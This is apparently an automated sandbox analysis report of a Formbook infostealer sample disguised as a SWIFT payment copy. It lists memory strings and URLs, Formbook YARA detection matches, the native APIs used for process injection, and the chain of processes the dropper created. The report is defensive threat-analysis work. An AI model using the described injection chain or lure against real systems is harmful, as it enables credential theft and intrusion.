            Source: typeperf.exe, 00000006.00000002.3838152195.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.lets-room.online&rand=
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rytrk.com
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rytrk.com/track.
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.networksolutions.com/
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_lan
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land_h
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.lets-room.online&utm_medium=parking&utm
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.lets-room.online&amp;reg_source=parking_auto
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000041E4000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.00000000037F4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FF1

            E-Banking Fraud

            Source: Yara matchFile source: 4.2.btpqr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.btpqr.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 4.2.btpqr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.btpqr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sampleStatic PE information: Filename: Payment_Copy_[SWIFT_COPY].exe
            Source: Payment_Copy_[SWIFT_COPY].exeStatic file information: Suspicious name
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040A063 NtGetContextThread,4_2_0040A063
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040A8A3 NtCreateSection,4_2_0040A8A3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040A273 NtSetContextThread,4_2_0040A273
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040AAC3 NtMapViewOfSection,4_2_0040AAC3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040B393 NtDelayExecution,4_2_0040B393
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_004283B3 NtClose,4_2_004283B3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040ACF3 NtCreateFile,4_2_0040ACF3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040A483 NtResumeThread,4_2_0040A483
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00409E53 NtSuspendThread,4_2_00409E53
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040AF23 NtReadFile,4_2_0040AF23
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040B7B3 NtAllocateVirtualMemory,4_2_0040B7B3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92B60 NtClose,LdrInitializeThunk,4_2_00B92B60
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00B92C70
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_00B92DF0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B935C0 NtCreateMutant,LdrInitializeThunk,4_2_00B935C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B94340 NtSetContextThread,4_2_00B94340
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B94650 NtSuspendThread,4_2_00B94650
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92AB0 NtWaitForSingleObject,4_2_00B92AB0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92AF0 NtWriteFile,4_2_00B92AF0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92AD0 NtReadFile,4_2_00B92AD0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92BA0 NtEnumerateValueKey,4_2_00B92BA0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92B80 NtQueryInformationFile,4_2_00B92B80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92BF0 NtAllocateVirtualMemory,4_2_00B92BF0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92BE0 NtQueryValueKey,4_2_00B92BE0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92CA0 NtQueryInformationToken,4_2_00B92CA0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92CF0 NtOpenProcess,4_2_00B92CF0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92CC0 NtQueryVirtualMemory,4_2_00B92CC0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92C00 NtQueryInformationProcess,4_2_00B92C00
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92C60 NtCreateKey,4_2_00B92C60
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92DB0 NtEnumerateKey,4_2_00B92DB0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92DD0 NtDelayExecution,4_2_00B92DD0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92D30 NtUnmapViewOfSection,4_2_00B92D30
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92D10 NtMapViewOfSection,4_2_00B92D10
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92D00 NtSetInformationFile,4_2_00B92D00
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92EA0 NtAdjustPrivilegesToken,4_2_00B92EA0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92E80 NtReadVirtualMemory,4_2_00B92E80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92EE0 NtQueueApcThread,4_2_00B92EE0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92E30 NtWriteVirtualMemory,4_2_00B92E30
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92FB0 NtResumeThread,4_2_00B92FB0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92FA0 NtQuerySection,4_2_00B92FA0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92F90 NtProtectVirtualMemory,4_2_00B92F90
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92FE0 NtCreateFile,4_2_00B92FE0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92F30 NtCreateSection,4_2_00B92F30
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B92F60 NtCreateProcessEx,4_2_00B92F60
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B93090 NtSetValueKey,4_2_00B93090
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B93010 NtOpenDirectoryObject,4_2_00B93010
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B939B0 NtGetContextThread,4_2_00B939B0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B93D10 NtOpenProcessToken,4_2_00B93D10
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 4_2_00B93D70 NtOpenThread,4_2_00B93D70
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03034340 NtSetContextThread,LdrInitializeThunk,6_2_03034340
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03034650 NtSuspendThread,LdrInitializeThunk,6_2_03034650
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032B60 NtClose,LdrInitializeThunk,6_2_03032B60
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03032BA0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03032BE0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03032BF0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032AD0 NtReadFile,LdrInitializeThunk,6_2_03032AD0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032AF0 NtWriteFile,LdrInitializeThunk,6_2_03032AF0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032F30 NtCreateSection,LdrInitializeThunk,6_2_03032F30
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032FB0 NtResumeThread,LdrInitializeThunk,6_2_03032FB0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032FE0 NtCreateFile,LdrInitializeThunk,6_2_03032FE0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03032E80
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03032EE0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03032D10
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03032D30
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032DD0 NtDelayExecution,LdrInitializeThunk,6_2_03032DD0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03032DF0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032C60 NtCreateKey,LdrInitializeThunk,6_2_03032C60
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03032C70
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03032CA0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_030335C0 NtCreateMutant,LdrInitializeThunk,6_2_030335C0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_030339B0 NtGetContextThread,LdrInitializeThunk,6_2_030339B0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032B80 NtQueryInformationFile,6_2_03032B80
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032AB0 NtWaitForSingleObject,6_2_03032AB0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032F60 NtCreateProcessEx,6_2_03032F60
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032F90 NtProtectVirtualMemory,6_2_03032F90
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032FA0 NtQuerySection,6_2_03032FA0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032E30 NtWriteVirtualMemory,6_2_03032E30
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032EA0 NtAdjustPrivilegesToken,6_2_03032EA0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032D00 NtSetInformationFile,6_2_03032D00
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032DB0 NtEnumerateKey,6_2_03032DB0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032C00 NtQueryInformationProcess,6_2_03032C00
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032CC0 NtQueryVirtualMemory,6_2_03032CC0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03032CF0 NtOpenProcess,6_2_03032CF0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03033010 NtOpenDirectoryObject,6_2_03033010
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03033090 NtSetValueKey,6_2_03033090
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03033D10 NtOpenProcessToken,6_2_03033D10
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_03033D70 NtOpenThread,6_2_03033D70
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_00704CA0 NtCreateFile,6_2_00704CA0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_00704DD0 NtReadFile,6_2_00704DD0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_00704E90 NtDeleteFile,6_2_00704E90
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_00704F10 NtClose,6_2_00704F10
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_00705040 NtAllocateVirtualMemory,6_2_00705040
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A
            Source: Payment_Copy_[SWIFT_COPY].exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 4.2.btpqr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.btpqr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/3@24/13
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042C1
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeFile created: C:\Users\user\AppData\Local\Temp\nsw8D44.tmp
            Source: Payment_Copy_[SWIFT_COPY].exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeFile read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Payment_Copy_[SWIFT_COPY].exeReversingLabs: Detection: 29%
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeFile read: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe
            Source: unknownProcess created: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeProcess created: C:\Users\user\AppData\Local\Temp\btpqr.exe "C:\Users\user\AppData\Local\Temp\btpqr.exe"
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeProcess created: C:\Users\user\AppData\Local\Temp\btpqr.exe C:\Users\user\AppData\Local\Temp\btpqr.exe
